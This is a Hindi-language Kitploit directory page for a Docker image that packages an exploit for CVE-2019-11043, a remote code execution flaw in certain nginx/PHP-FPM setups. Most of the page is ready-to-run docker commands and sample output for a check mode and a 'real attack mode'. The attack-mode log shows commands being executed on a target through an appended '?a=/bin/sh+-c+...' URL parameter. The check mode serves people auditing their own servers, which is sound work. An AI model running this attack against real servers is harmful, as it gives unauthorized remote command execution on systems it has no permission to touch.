Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
docker-CVE-2019-11043 — nginx/php-fpm अनुप्रयोगों पर CVE-2019-11043 भेद्यता की जांच करने के लिए Docker छवि और कमांड। | Kitploit
उपकरण/GitHubGitHub/ypereirareis/docker-cve-2019-11043
भेद्यता स्कैनरभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubypereirareis/docker-cve-2019-11043

docker-CVE-2019-11043

nginx/php-fpm अनुप्रयोगों पर CVE-2019-11043 भेद्यता की जांच करने के लिए Docker छवि और कमांड।

रिपॉजिटरी देखेंवेबसाइट
8216 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-11043 की जाँच करने के लिए Docker इमेज और कमांड्स

Build Status

  • CVE: CVE-2019-11043
  • Description: PHP संस्करण 7.1.x (7.1.33 से नीचे), 7.2.x (7.2.24 से नीचे) और 7.3.x (7.3.11 से नीचे) में कुछ FPM कॉन्फ़िगरेशन में FPM मॉड्यूल के लिए आवंटित बफ़र्स से परे FCGI प्रोटोकॉल डेटा के लिए आरक्षित स्पेस में लिखना संभव है, जिससे रिमोट कोड निष्पादन की संभावना खुलती है।
  • Details : https://nvd.nist.gov/vuln/detail/CVE-2019-11043
  • Github exploit: https://github.com/neex/phuip-fpizdam

सहायता

root@kitploit:~
docker run --rm ypereirareis/cve-2019-11043
docker run --rm ypereirareis/cve-2019-11043 -h

किसी वेबसाइट या URL की जाँच करें

root@kitploit:~
docker run --rm ypereirareis/cve-2019-11043 --only-qsl https://domain.tld/index.php

भेद्यता परिणाम उदाहरण:

https://github.com/neex/phuip-fpizdam#playground-environment

केवल जाँच मोड

root@kitploit:~
$ docker run --rm --net=host ypereirareis/cve-2019-11043 --only-qsl http://127.0.0.1:8080/script.php
2019/10/30 10:55:35 Base status code is 200
2019/10/30 10:55:35 Status code 502 for qsl=1765, adding as a candidate
2019/10/30 10:55:35 The target is probably vulnerable. Possible QSLs: [1755 1760 1765]
2019/10/30 10:55:35 Detect() found QSLs and that's it

वास्तविक हमला मोड

root@kitploit:~
$ docker run --rm --net=host ypereirareis/cve-2019-11043 http://127.0.0.1:8080/script.php 
2019/10/30 11:03:33 Base status code is 200
2019/10/30 11:03:33 Status code 502 for qsl=1765, adding as a candidate
2019/10/30 11:03:33 The target is probably vulnerable. Possible QSLs: [1755 1760 1765]
2019/10/30 11:03:33 Attack params found: --qsl 1760 --pisos 55 --skip-detect
2019/10/30 11:03:33 Trying to set "session.auto_start=0"...
2019/10/30 11:03:33 Detect() returned attack params: --qsl 1760 --pisos 55 --skip-detect <-- REMEMBER THIS
2019/10/30 11:03:33 Performing attack using php.ini settings...
2019/10/30 11:03:33 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
2019/10/30 11:03:33 Trying to cleanup /tmp/a...
2019/10/30 11:03:33 Done!

Exploit

कोई भेद्यता परिणाम उदाहरण:

root@kitploit:~
$ docker run --rm ypereirareis/cve-2019-11043 --only-qsl https://domain.tld/wp_admin.php
2019/10/28 09:41:30 Base status code is 200
2019/10/28 09:41:32 Detect() returned error: no qsl candidates found, invulnerable or something wrong

Docker इमेज बनाएँ

root@kitploit:~
docker build -t ypereirareis/cve-2019-11043 .
टूल डाउनलोड करें